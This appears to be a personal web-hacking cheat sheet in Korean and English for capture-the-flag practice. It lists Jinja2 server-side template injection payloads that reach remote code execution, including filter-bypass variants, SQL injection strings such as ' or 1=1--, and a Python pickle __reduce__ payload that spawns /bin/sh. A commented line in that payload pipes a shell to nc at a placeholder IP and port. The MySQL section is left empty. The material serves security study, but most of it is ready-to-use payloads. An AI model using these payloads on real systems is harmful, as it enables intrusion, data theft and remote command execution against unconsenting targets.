
web note (update 2021.10.27)

post will be frequently updated

SSTI (Server Side Template Injection)

해당 취약점은 웹 프레임워크에서 사용되는 여러 가지 Template Engine에서 발생하며, 특별한 구문을 통해 RCE를 일으킬 수도 있다.
This vulnerability occurs in various Template Engines used in web frameworks, RCE and can also be triggered through special syntax.

▶ jinja2

# 기본
{{ 4*4 }} => 16

# check with config
{{ config }}
{{ config.items() }}
{{ config['secret_key'] }}

# RCE with config
{{ config.__class__.__init__.__globals__['os'].popen("ls").read() }}
{{ (config|attr("__class__")).__init__.__globals__['os'].popen('cat flag').read() }}

# etc ('',(),get_flashed_messages, url_for, ...)
{{ ''.__class__.__mro__[1].__subclasses__()[**index**]('cat flag', shell=True, stdout=-1).communicate() }}
{{ get_flashed_messages.__globals__.__builtins__.open("/flag").read() }}
{{ url_for.__globals__.__builtins__.eval('__import__("os").popen("ls -al").read()') }}
# with request - 필터링이 매우 많을 경우 more query + request를 활용하여 우회
http://foo.bar/?payload={{ request|attr('class')|attr(request.args.get('mro'))|attr(request.args.get('getitem'))(1) }}&class=__class__&mro=__mro__&getitem=__getitem__

SQLI (sql injection)

해당 취약점은 DB를 관리하는 응용 프로그램에서 SQL 쿼리를 전달할 때 의도하지 않은 구문을 전달할 수 있도록 변조시키는 데 목적이 있다.
The vulnerability is aimed at modulating the DB management application to deliver unintended phrases when delivering SQL queries.

1. Comment symbol

-- example.
Select * from tbl where id='(user_input)'

-- Select ALL query from tbl
user_input="' or 1=1-- " => Select * from tbl where id='' or 1=1--'
user_input="' or 1=1#" => Select * from tbl where id='' or 1=1#
user_input="' or 1=1/*1234*/" => Select * from tbl where id='' or 1=1/*1234*/' ...?
(must have closed symbol)

2. with single quarter

-- example.
Select * from tbl where id='(user_input)'

-- Select ALL query from tbl
user_input="' or 1='1" => Select * from tbl where id='' or 1='1'

3. and, or, &&, ||, in, between, like

-- and, or
Select * from tbl where id='1234' and pw='5678'
Select * from tbl where id='1234' or pw='5678'

-- &&, || (no space required)
Select * from tbl where id='1234'&&pw='5678'
Select * from tbl where id='1234'||pw='5678'

-- in
Select * from tbl where id in '1234' and pw in '5678'

-- between and (both number and char are possible)
Select * from tbl where age between 20 and 30 -- 20<=age<=30
Select * from tbl where score between 'A' and 'C' -- 'A'<=score<='C'

--like (starts with ~, ends with ~, include ~, length)
Select * from tbl where name like 'Bae%' -- starts with Bae
Select * from tbl where name like '%uk' -- ends with uk
Select * from tbl where name like '%won%' -- include won
Select * from tbl where name like '___' -- length 3 chars
Select * from tbl where binary name like '~' -- distinguish upper/lower

4. Internal function in mysql

python pickle deserialization

pickle로 직렬화된 객체가 변조되어 역직렬화하는 과정에서 시스템에 접근하거나 의도치 않은 것이 실행되기도 한다. 원하는 class를 선언한 뒤, __reduce__를 통하여 pickle.loads 함수에서 unpickle 시 tuple을 반환하여 함수를 실행시킬 수 있다.

import os
import pickle

class payload(object):
  def __reduce__(self):
    #return (os.system, ('ls', ))
    #return (os.system, ('cat flag', ))
    return (os.system, ('/bin/sh', ))
    #return (os.system, ('/bin/sh | nc [ip] [port]', ))

pickle.loads(pickle_d) # get shell anyway
$ id
uid=1000(test) gid=1000(test) groups=1000(test)

update 예정.

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